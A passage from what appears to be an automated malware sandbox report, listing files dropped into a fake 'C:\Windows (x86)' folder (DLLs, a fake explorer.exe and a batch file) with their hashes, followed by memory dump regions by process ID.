                                                                                                                      8c5af3b03fcc11bf17ded481bddbdfc0811077c7391b0d4ba616cc2ead47e80c

                                                                                                                      SHA512

                                                                                                                      fbcfce2b040762de747da96460d6c648616054a8a004cb385cbf179981321339b254fa282fab171925f63ab4f9ef86724c595635db13b22521bfcbef8f9cc555

                                                                                                                    • C:\Windows (x86)\dmdskres2.dll

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      00adb63b901732cb6ebcdb3b9d404945

                                                                                                                      SHA1

                                                                                                                      946088b565459987b96427e590fceb078a3a9688

                                                                                                                      SHA256

                                                                                                                      e8a7eee20b9de1d981334011ac5550c44fb98a189a4ea24a6660c3efb314b51d

                                                                                                                      SHA512

                                                                                                                      ada58be64f7cab2fcca27e753ca9b5f4fd2eec3e6ab705bc66ad33d009819a0e5fd5bda7ccb34151cf23a023c0dd89ce4b3bfb0696ab8135c9fd9002274717a2

                                                                                                                    • C:\Windows (x86)\dxmasf.dll

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      db18dedb3b5080ff23cfb17365f8f27a

                                                                                                                      SHA1

                                                                                                                      ac2d2cf466cb8314f903599d385cdaa28f6ee2b1

                                                                                                                      SHA256

                                                                                                                      7a9ad21e76d3bd95d851752af9bc7e6e46a479994a12d51e8e62040fc06f61dd

                                                                                                                      SHA512

                                                                                                                      50e808b04a7d24b4326056cd6088ec1e2485057c2ee2102cf01093a1c8ed20929746d6c6ea19acc7ddb70b8243f46a46cef31dd1e49146db88d869227f4251d5

                                                                                                                    • C:\Windows (x86)\edgehtmlpluginpolicy.bin

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      08c33e4ab904ec0960b0781ed26ae039

                                                                                                                      SHA1

                                                                                                                      120537ad8aa71fa3f818d940557f0a9ee1049938

                                                                                                                      SHA256

                                                                                                                      b2803c9cca7abb72c72269b3ad0608f717574632bfea0cdb7145cdc93b7b3769

                                                                                                                      SHA512

                                                                                                                      137d22033fba7f72ef3c8c23771328ff4a3f67ece5f969e22c5f057f794c8d6af00e826f7b06ac10e15fc3600f151da2268f1342123b2f6a1701aedd10b477d3

                                                                                                                    • C:\Windows (x86)\explorer.exe

                                                                                                                      Filesize

                                                                                                                      5.1MB

                                                                                                                      MD5

                                                                                                                      aa29dd540139be90fe02be76c6893534

                                                                                                                      SHA1

                                                                                                                      333faca54fc888198373cf5572df0ff092e38c9f

                                                                                                                      SHA256

                                                                                                                      3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

                                                                                                                      SHA512

                                                                                                                      a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

                                                                                                                    • C:\Windows (x86)\f3ahvoas.dll

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      bc244c0c43d633372aaa77aeff84c352

                                                                                                                      SHA1

                                                                                                                      c547d5d6b1614efde458c67dbb0ccbd5f4877900

                                                                                                                      SHA256

                                                                                                                      f3db39d0328a3c6c3226a352125a2f0f778982253afb1a171dcbce9924a30627

                                                                                                                      SHA512

                                                                                                                      0fcd0b0dffb369cd33c174dcc10959cf7a157e3c293911f7a705eb1117ae7ec31f79cfb4230c475a894f419f1f0f6c108e932ecf68746778c63d7f597b52952b

                                                                                                                    • C:\Windows (x86)\icmp.dll

                                                                                                                      Filesize

                                                                                                                      3KB

                                                                                                                      MD5

                                                                                                                      225f69152008527eaf2b8f44a48fb95e

                                                                                                                      SHA1

                                                                                                                      ccb1d8b424a8061804b6421b94e3892f8cb7cd89

                                                                                                                      SHA256

                                                                                                                      f0d008682013a54a20d169ba702b72f4c5d0d7c12de09ccdecf514b2928182f6

                                                                                                                      SHA512

                                                                                                                      b8e10fa6f8e19f440f97454133c723265b492926c309f422eb720ba9c990790bad4e7e63fb27658bf2240de341ca71c5053f703eea286d9a08382e3c1620a3e8

                                                                                                                    • C:\Windows (x86)\ieuinit.inf

                                                                                                                      Filesize

                                                                                                                      3KB

                                                                                                                      MD5

                                                                                                                      c1127463655f541956ff02a325996ecf

                                                                                                                      SHA1

                                                                                                                      a43961de9c70bac7c807d679376083904f8c4d7d

                                                                                                                      SHA256

                                                                                                                      9437a11c86057ec560402db712cbafeebcfc5df8fe389105c65751ecf0d02abc

                                                                                                                      SHA512

                                                                                                                      c0874025afbc94844f8354d2ab1e8c686eaca68df2c2e0690fe210e0f0df4e658c26121149111a60f747707c7f4e34d0e8f6a662b632c0bdc6e04d7ddfe60630

                                                                                                                    • C:\Windows (x86)\iglhxs64.vp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      MD5

                                                                                                                      8589ccd79af444175f0e91ac27c6343e

                                                                                                                      SHA1

                                                                                                                      2fe8411d582d22b0132b6cf10dec81547c7e4ff6

                                                                                                                      SHA256

                                                                                                                      2498331bf9ffe87bcbefb811512192866ac5db4d9f7f1826b071e10739964a9c

                                                                                                                      SHA512

                                                                                                                      1e70cb606d4d8e71c330988bc21b80ddd795bac697546c74458fdeb8bca53d690f680929395b9db82b4922b312d93f56edf0fa7dda6173fe144fea5d1e022734

                                                                                                                    • C:\Windows (x86)\iologmsg.dll

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      db13e4ffebd3b99066beaa509854b225

                                                                                                                      SHA1

                                                                                                                      6a7c6e2bb582a9aa9fd37db39fa170b3f8a19faa

                                                                                                                      SHA256

                                                                                                                      4d0f4c3e54126ea132930bc66f28f25c6e2be7df597f688b986c59bd0c787343

                                                                                                                      SHA512

                                                                                                                      49bedc1416cecce822fddebec6c1d28127fc1fbd15d9527d8a25d1767595940ac364ead9eceb05b204dfe3ad43c1329e334adcfcd67ad7bc8d1d235ac7c1ddfd

                                                                                                                    • C:\Windows (x86)\kanji_1.uce

                                                                                                                      Filesize

                                                                                                                      6KB

                                                                                                                      MD5

                                                                                                                      7c0c25f4ba1084c4abbeea2c74194c5f

                                                                                                                      SHA1

                                                                                                                      618b9958703b4c109a94a3630ab3f2baa364a8a3

                                                                                                                      SHA256

                                                                                                                      2373bf7e4f975d25fb3eabe004fbe138f9dba7ed6ffb9c967edc134d4d5956b7

                                                                                                                      SHA512

                                                                                                                      2d043ba789e30690d1591cce623e31910a9b8775de62ca173c6a2794174cde6837f5a9c8f646bc86d1fe838dcd4f6c33765e5d87337fb8b159c273152a933f7c

                                                                                                                    • C:\Windows (x86)\kanji_2.uce

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      529bbd63519bbd654ef328454019693f

                                                                                                                      SHA1

                                                                                                                      77ff1ec7c3192dce109d15b3bc54013d102714a6

                                                                                                                      SHA256

                                                                                                                      32e4e19efb2f90bd439c6bba865563857d664fa6da87cb195e85ee97a0853bfc

                                                                                                                      SHA512

                                                                                                                      eb82ac419003078503d9c7e9e826bbc9c56adf12d456a287e80c079d9991728aed49199318d63fda17596856c9294cdc9b8561e26efab941d4e046c68702bf70

                                                                                                                    • C:\Windows (x86)\kbd101.dll

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      8ffda05cf3f0c173ff428490de3b2d09

                                                                                                                      SHA1

                                                                                                                      229412646a8308acfc3f6afd1339ab8d0221bd1e

                                                                                                                      SHA256

                                                                                                                      48f620ed308217b745c4e2e4293690ebc5f2dc9369d892775365a66be4691ce8

                                                                                                                      SHA512

                                                                                                                      8bfb730f76ea555884309fa98240e1b1fb495e9cd6ed8b082eeca1ab1073d955170d6cea704840f84b4bf923bc74d1c57c6e19ba107e401af2adda6445458bbb

                                                                                                                    • C:\Windows (x86)\kbd101a.dll

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      6fdcf6e77171991dbb2f57ac4f17b508

                                                                                                                      SHA1

                                                                                                                      eeb923a7091f39d31dc47a3a26c4f8e297a2e723

                                                                                                                      SHA256

                                                                                                                      65ad0cb85dd0aea1da456809f1b4657286efe78f6229c7067ad4d27eb8dd3457

                                                                                                                      SHA512

                                                                                                                      5952e04b36e854d73bd3e89b99c9ae15c4d1c65891112d232b549bca8263f67e9800594a2368883eb104eba6bb243ecffdfc6e7470eafb79f37b59147ec43e16

                                                                                                                    • C:\Windows (x86)\kbd101b.dll

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      cad4474377572619bdceff58076e2471

                                                                                                                      SHA1

                                                                                                                      bada002938f3cc40e758eae29f43e8de00942723

                                                                                                                      SHA256

                                                                                                                      293b7f6d7dfd283c80a2b9f70e460187e26b16a2c757cd93209d47cf7ad9fc71

                                                                                                                      SHA512

                                                                                                                      2e1f392c04cc8482e3a49be4c991d348436e133e01e920568753e6abe508cf1dceebd458d7c99fad6adba5048fd5f49ecc69219e7ba2686e3fae7c5787287c3a

                                                                                                                    • C:\Windows (x86)\xagal.bat

                                                                                                                      Filesize

                                                                                                                      759B

                                                                                                                      MD5

                                                                                                                      104470f3c1211668407c2519f44862f9

                                                                                                                      SHA1

                                                                                                                      58054e1f3ef8e70210fe362dd491a65231494fcb

                                                                                                                      SHA256

                                                                                                                      cd2c3436284a9e2e6505a01d73edad527e3094a7c7efc7890d476638924ed2bf

                                                                                                                      SHA512

                                                                                                                      aa1575f35d252f0a0c19599d87cd44483c3468873cd9f141e22214f22d9b321d227d9a3b027b923ea2a931896f5f7811eabf8f7ff2e7a9d869010049888848d7

                                                                                                                    • memory/220-284-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/220-287-0x000002B884650000-0x000002B884670000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-285-0x000002B884650000-0x000002B884670000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-288-0x000002B8846D0000-0x000002B8846F0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-286-0x000002B8846D0000-0x000002B8846F0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-289-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1004-273-0x0000020098440000-0x0000020098460000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-280-0x0000020098440000-0x0000020098460000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-279-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1004-278-0x0000020099E50000-0x0000020099E70000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-281-0x0000020099E50000-0x0000020099E70000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-274-0x0000020099E50000-0x0000020099E70000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-277-0x0000020098440000-0x0000020098460000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-271-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1012-275-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/1012-276-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/1784-267-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1784-268-0x0000027F11A10000-0x0000027F11A50000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      256KB

                                                                                                                    • memory/1784-266-0x0000027F11760000-0x0000027F11780000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1784-265-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/2472-135-0x0000000140000000-0x0000000140023000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      140KB

                                                                                                                    • memory/2472-152-0x0000000140000000-0x0000000140023000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      140KB

                                                                                                                    • memory/3476-272-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/3476-283-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/3620-190-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/3620-218-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/5000-270-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/5000-163-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB